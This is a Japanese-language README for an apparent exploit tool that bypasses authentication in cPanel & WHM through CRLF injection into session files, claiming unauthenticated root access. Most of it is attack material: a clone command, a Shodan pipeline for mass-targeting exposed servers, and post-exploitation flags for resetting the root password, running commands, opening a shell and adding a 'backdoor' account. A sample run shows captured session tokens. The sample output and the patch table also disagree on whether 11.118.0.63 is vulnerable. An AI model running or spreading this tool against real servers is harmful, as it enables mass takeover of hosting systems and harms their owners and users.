
cPanel & WHM - セッションファイルCRLFインジェクションによる認証バイパス
⚡ 未認証ルート – セッションファイル CRLF インジェクション ⚡
「すべてを支配する一つのチェーン。」
┌─────────────────────────────────────────────────────────────┐
│ ステージ 1 ── 事前認証セッションクッキーを発行 │
│ ステージ 2 ── `Authorization` ヘッダー経由の CRLF 注入 │
│ ステージ 3 ── `do_token_denied` を発火(raw → cache) │
│ ステージ 4 ── JSON API 経由で WHM ルートアクセスを検証 │
└─────────────────────────────────────────────────────────────┘
💥 結果 – 認証情報不要で WHM への完全なルートアクセスを獲得。
このプロジェクトは MIT ライセンス の下で公開されています – 自由に使用・変更・配布できますが、悪用はしないでください 😈。
詳細は LICENSE ファイルを参照してください。
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940
依存関係ゼロ – Python 3 標準ライブラリのみ。
pipやvirtualenvなどの面倒なものは一切不要です。
./CVE-2026-41940.py -u https://target.com:2087
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30
サーバーを掌握したら、以下が可能です:
--action list--action passwd --passwd "h4ck3d!"--action cmd --cmd "id;whoami"--action shell(完全な WHM ターミナル)--action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"cat /etc/passwd--action info$ ./CVE-2026-41940.py -u https://192.168.1.100:2087
設定:
ターゲット : 1
スレッド : 10
タイムアウト: 15秒
アクション : スキャンのみ
[10:23:15] [SCAN] 4段階エクスプロイトチェーンを開始... https://192.168.1.100:2087
[10:23:15] [INFO] 正規ホスト名を検出: server.example.com
[10:23:15] [STEP] ステージ 1/4 — 事前認証セッションを発行...
[10:23:16] [ OK] ステージ1: 事前認証セッション = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] ステージ 2/4 — Authorization ヘッダー経由で CRLF 注入...
[10:23:17] [ OK] ステージ2: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] ステージ 3/4 — do_token_denied ガジェットを発火(raw→cache)...
[10:23:18] [ OK] ステージ3: HTTP 401 — do_token_denied ガジェット発火
[10:23:18] [STEP] ステージ 4/4 — WHM ルートアクセスを検証...
[10:23:18] [INFO] ステージ4: HTTP 200 {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 確認 — WHM ルートアクセス獲得! (v11.118.0.63 — 脆弱性確認済み)
[10:23:18] [PWND] トークン : /cpsess1234567890
[10:23:18] [PWND] セッション : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND] バージョン : 11.118.0.63
[10:23:18] [PWND] API URL : https://192.168.1.100:2087/cpsess1234567890/json-api/version
CVE-2026-41940 — スキャン完了
時間: 3.2秒 · ターゲット: 1
1 件の脆弱なターゲット
[*] ターゲット : https://192.168.1.100:2087
[*] バージョン : 11.118.0.63
[*] トークン : /cpsess1234567890
[*] API URL : https://192.168.1.100:2087/cpsess1234567890/json-api/version
[*] セッション : 9a7f8e3d2c1b0a9f
[*] 証拠 : {"version":"11.118.0.63",...}
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
上記ビルド 未満 のすべてのバージョンが脆弱です。
0xgh057r3c0n – セキュリティ研究者、リバースエンジニア、そしてコーヒー中毒者。
GitHub | Twitter
このツールは許可されたセキュリティテストおよび教育目的のみを意図しています。
コンピュータシステムへの不正アクセスは違法です。作者および貢献者は、このソフトウェアの誤用または損害について一切の責任を負いません。
責任を持って使用し、常に事前に許可を取得してください。
🔥 ハック・ザ・プラネット、ただし合法的に。 🔥
| フラグ | 説明 |
|---|
-u, --url | 単一ターゲット URL(例: https://host:2087) |
-l, --list | URL を1行ごとに記載したファイル |
--hostname | 正規の Host ヘッダーを上書き(自動検出) |
-t, --threads | スレッド数(デフォルト: 10) |
--timeout | タイムアウト秒数(デフォルト: 15) |
--rate-limit | ターゲット間の待機時間(秒) |
--action | エクスプロイト後アクション: list、passwd、cmd、exec、info、version、shell、adduser |
--passwd | 新しい root パスワード(--action passwd と併用) |
--cmd | OS コマンド(--action cmd/exec と併用) |
--new-user | 新しい cPanel ユーザー名(--action adduser と併用) |
--new-domain | 新しい cPanel ドメイン(--action adduser と併用) |
-o, --output | 結果を JSON で保存 |
| ブランチ | パッチ適用ビルド | ステータス |
|---|
| 11.110 | 11.110.0.97 | 🛡️ 修正済み |
| 11.118 | 11.118.0.63 | 🛡️ 修正済み |
| 11.126 | 11.126.0.54 | 🛡️ 修正済み |
| 11.132 | 11.132.0.29 | 🛡️ 修正済み |
| 11.134 | 11.134.0.20 | 🛡️ 修正済み |
| 11.136 | 11.136.0.5 | 🛡️ 修正済み |